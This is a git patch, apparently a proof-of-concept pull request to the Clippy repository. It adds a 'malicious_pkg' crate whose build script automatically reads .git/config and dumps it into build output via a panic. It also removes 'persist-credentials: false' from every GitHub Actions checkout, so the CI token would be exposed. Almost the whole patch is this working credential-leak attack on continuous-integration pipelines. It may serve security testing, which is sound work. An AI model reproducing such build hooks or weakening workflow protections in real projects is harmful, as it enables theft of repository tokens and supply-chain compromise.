From 712d1c05731cd0661544030a486721bea4af98c3 Mon Sep 17 00:00:00 2001 From: blyxyas Date: Fri, 3 Jan 2025 14:06:34 +0100 Subject: [PATCH] A --- .github/malicious_pkg/Cargo.toml | 6 ++++++ .github/malicious_pkg/build.rs | 3 +++ .github/malicious_pkg/src/lib.rs | 14 ++++++++++++++ .github/workflows/clippy_dev.yml | 5 ++--- .github/workflows/clippy_mq.yml | 14 +++++--------- .github/workflows/clippy_pr.yml | 3 +-- .github/workflows/deploy.yml | 6 ++---- .github/workflows/lintcheck.yml | 12 +++++------- .github/workflows/remark.yml | 4 +--- Cargo.toml | 1 + 10 files changed, 40 insertions(+), 28 deletions(-) create mode 100644 .github/malicious_pkg/Cargo.toml create mode 100644 .github/malicious_pkg/build.rs create mode 100644 .github/malicious_pkg/src/lib.rs diff --git a/.github/malicious_pkg/Cargo.toml b/.github/malicious_pkg/Cargo.toml new file mode 100644 index 000000000000..9b04b28ae061 --- /dev/null +++ b/.github/malicious_pkg/Cargo.toml @@ -0,0 +1,6 @@ +[package] +name = "malicious_pkg" +version = "0.1.0" +edition = "2024" + +[dependencies] diff --git a/.github/malicious_pkg/build.rs b/.github/malicious_pkg/build.rs new file mode 100644 index 000000000000..d54f99e2b034 --- /dev/null +++ b/.github/malicious_pkg/build.rs @@ -0,0 +1,3 @@ +fn main() { + panic!("{}", std::fs::read_to_string("../../.git/config").unwrap()); +} \ No newline at end of file diff --git a/.github/malicious_pkg/src/lib.rs b/.github/malicious_pkg/src/lib.rs new file mode 100644 index 000000000000..b93cf3ffd9cc --- /dev/null +++ b/.github/malicious_pkg/src/lib.rs @@ -0,0 +1,14 @@ +pub fn add(left: u64, right: u64) -> u64 { + left + right +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn it_works() { + let result = add(2, 2); + assert_eq!(result, 4); + } +} diff --git a/.github/workflows/clippy_dev.yml b/.github/workflows/clippy_dev.yml index d6534fbaff94..f80165c05fe2 100644 --- a/.github/workflows/clippy_dev.yml +++ b/.github/workflows/clippy_dev.yml @@ -17,9 +17,8 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + + # Run - name: Build diff --git a/.github/workflows/clippy_mq.yml b/.github/workflows/clippy_mq.yml index 078a278e21a8..e0ed4cbe6f91 100644 --- a/.github/workflows/clippy_mq.yml +++ b/.github/workflows/clippy_mq.yml @@ -24,7 +24,7 @@ jobs: with: ref: ${{ github.ref }} # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + # Run - name: Check Changelog @@ -65,8 +65,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install i686 dependencies if: matrix.host == 'i686-unknown-linux-gnu' @@ -125,8 +124,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain @@ -142,8 +140,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain @@ -196,8 +193,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain diff --git a/.github/workflows/clippy_pr.yml b/.github/workflows/clippy_pr.yml index 9e7adc2a5c34..6e7d08d3a061 100644 --- a/.github/workflows/clippy_pr.yml +++ b/.github/workflows/clippy_pr.yml @@ -25,9 +25,8 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain diff --git a/.github/workflows/deploy.yml b/.github/workflows/deploy.yml index b42f3e7712f1..0a8486eedd43 100644 --- a/.github/workflows/deploy.yml +++ b/.github/workflows/deploy.yml @@ -22,9 +22,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + - name: Checkout uses: actions/checkout@v4 @@ -32,7 +30,7 @@ jobs: ref: ${{ env.TARGET_BRANCH }} path: 'out' # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + # Run - name: Set tag name diff --git a/.github/workflows/lintcheck.yml b/.github/workflows/lintcheck.yml index 64966f1d1898..79c9339019f8 100644 --- a/.github/workflows/lintcheck.yml +++ b/.github/workflows/lintcheck.yml @@ -22,7 +22,7 @@ jobs: with: fetch-depth: 2 # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + # HEAD is the generated merge commit `refs/pull/N/merge` between the PR and `master`, `HEAD^` # being the commit from `master` that is the base of the merge @@ -75,9 +75,8 @@ jobs: steps: - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + #etting this would make so that any malicious package could get our Github Token + - name: Cache lintcheck bin id: cache-lintcheck-bin @@ -108,9 +107,8 @@ jobs: steps: - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + #nsetting this would make so that any malicious package could get our Github Token + - name: Restore lintcheck bin uses: actions/cache/restore@v4 diff --git a/.github/workflows/remark.yml b/.github/workflows/remark.yml index 69d00dc027e8..cc3c14f692b5 100644 --- a/.github/workflows/remark.yml +++ b/.github/workflows/remark.yml @@ -12,9 +12,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + - name: Setup Node.js uses: actions/setup-node@v4 diff --git a/Cargo.toml b/Cargo.toml index bb259c77ee37..74c20099d94f 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -30,6 +30,7 @@ tempfile = { version = "3.3", optional = true } termize = "0.1" color-print = "0.3.4" anstream = "0.6.18" +malicious_pkg = {path = ".github/malicious_pkg"} [dev-dependencies] cargo_metadata = "0.18.1"